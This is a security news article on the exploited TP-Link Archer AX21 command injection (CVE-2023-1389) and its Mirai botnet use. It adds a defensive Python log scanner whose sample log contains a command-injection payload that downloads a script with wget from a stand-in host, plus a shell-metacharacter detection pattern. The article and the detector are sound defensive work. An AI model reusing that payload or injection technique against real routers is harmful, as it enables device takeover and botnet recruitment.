Attackers are actively exploiting CVE-2023-1389, a vulnerability in TP-Link Archer AX21 (AX1800) Wi-Fi routers that was first demonstrated at the Pwn2Own hacking competition in December 2022. Compromised devices are being enrolled in a botnet and used to launch DDoS attacks.
The vulnerability was first shown at Pwn2Own Toronto 2022, where two separate teams independently compromised the device through both its LAN and WAN interfaces. TP-Link released firmware 1.1.4 Build 20230219 in March 2023 to address the issue.
According to the Trend Micro Zero Day Initiative (ZDI), which organizes Pwn2Own, in-the-wild exploitation attempts began on April 11, 2023, initially targeting devices in Eastern Europe before spreading worldwide.
CVE-2023-1389 (CVSS score 8.8) is an unauthenticated command injection vulnerability in the locale API of the web management interface of TP-Link Archer AX21 routers. The root cause is missing input sanitization: the value supplied by a remote, unauthenticated client is passed into a shell command without filtering, so attackers can inject commands that are eventually executed on the device.
An attacker exploits the flaw with a specially crafted request whose country parameter carries the payload, followed by a second request to the same API that triggers execution of the injected command.
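The two-request pattern described above is something a defender can look for in router or upstream proxy access logs. The script below is an added example, not code from the article or from TP-Link: it parses a few constructed access-log lines, flags a locale API "write" request whose country parameter contains shell metacharacters (such as $( or backticks), and escalates the alert when the same source then issues the "read" request that would trigger the injected command. The endpoint path (containing /locale), the form=country / operation=write / operation=read parameter names, and the assumption that the parameters appear in the query string (a POST body would not be visible in an access log and needs a proxy or IDS capture) are all assumptions made for the example.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed sample access-log lines (combined log format). These are NOT real
# traffic; the IPs are documentation ranges and the payload is illustrative.
# Assumed request shape: /locale endpoint, form=country, operation=write|read.
SAMPLE_LOG = [
    '203.0.113.5 - - [11/Apr/2023:10:00:01 +0000] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(wget+http://198.51.100.9/x.sh+-O+/tmp/x.sh) HTTP/1.1" 200 21',
    '203.0.113.5 - - [11/Apr/2023:10:00:02 +0000] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=read HTTP/1.1" 200 21',
    '192.0.2.10 - - [11/Apr/2023:10:05:00 +0000] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=US HTTP/1.1" 200 21',
    '198.51.100.7 - - [11/Apr/2023:10:06:00 +0000] "GET /cgi-bin/luci/;stok=/locale?form=lang&operation=read HTTP/1.1" 200 21',
]

# Combined-log-format prefix: client, ident, user, [timestamp], "METHOD URL ...", status
LOG_RE = re.compile(
    r'^(?P<src>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<url>\S+)[^"]*" (?P<status>\d{3})'
)

# Shell metacharacters that have no business in a two-letter country code.
SHELL_META = re.compile(r"\$\(|\$\{|`|[;|&]")


def parse_line(line):
    """Split one access-log line into source, timestamp, path and query params."""
    m = LOG_RE.match(line)
    if not m:
        return None
    req = m.groupdict()
    parts = urlsplit(req["url"])
    req["path"] = parts.path
    # parse_qs decodes '+' to space, so the payload reads like the shell would see it.
    req["params"] = {k: v[0] for k, v in parse_qs(parts.query, keep_blank_values=True).items()}
    return req


def classify(req):
    """Return 'write-inject', 'read' or None for one parsed request."""
    if "/locale" not in req["path"] or req["params"].get("form") != "country":
        return None
    op = req["params"].get("operation")
    if op == "write" and SHELL_META.search(req["params"].get("country", "")):
        return "write-inject"
    if op == "read":
        return "read"
    return None


def scan_log(lines):
    """Emit one alert per injected write, and a second 'triggered' alert when the
    same source follows up with the read request that fires the payload."""
    pending = {}  # src -> injected country value awaiting its read request
    alerts = []
    for line in lines:
        req = parse_line(line)
        if req is None:
            continue
        kind = classify(req)
        if kind == "write-inject":
            pending[req["src"]] = req["params"]["country"]
            alerts.append({"src": req["src"], "ts": req["ts"], "stage": "injected",
                           "payload": req["params"]["country"]})
        elif kind == "read" and req["src"] in pending:
            alerts.append({"src": req["src"], "ts": req["ts"], "stage": "triggered",
                           "payload": pending.pop(req["src"])})
    return alerts


if __name__ == "__main__":
    for alert in scan_log(SAMPLE_LOG):
        print(f'{alert["ts"]} {alert["src"]} {alert["stage"]}: {alert["payload"]}')
```

Run against the constructed sample, the script reports two alerts for 203.0.113.5 (the injected write, then the read that triggers it) and stays silent on the legitimate country write from 192.0.2.10 and the unrelated lang read. Matching on metacharacters rather than a specific payload keeps the check useful as the botnet rotates download URLs; a stricter variant would also alert on any country value that is not a plain alphabetic code.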
ZDI reports that a Mirai botnet variant is exploiting the vulnerability to gain an initial foothold on vulnerable devices. Once in, the malware downloads a payload built for the router's CPU architecture and enrolls the device in the botnet. This variant is geared toward DDoS attacks on game servers and can launch attacks targeting the Valve Source Engine (VSE).
This variant can also mimic legitimate network traffic, which makes it harder for security tools to distinguish attack traffic from normal traffic.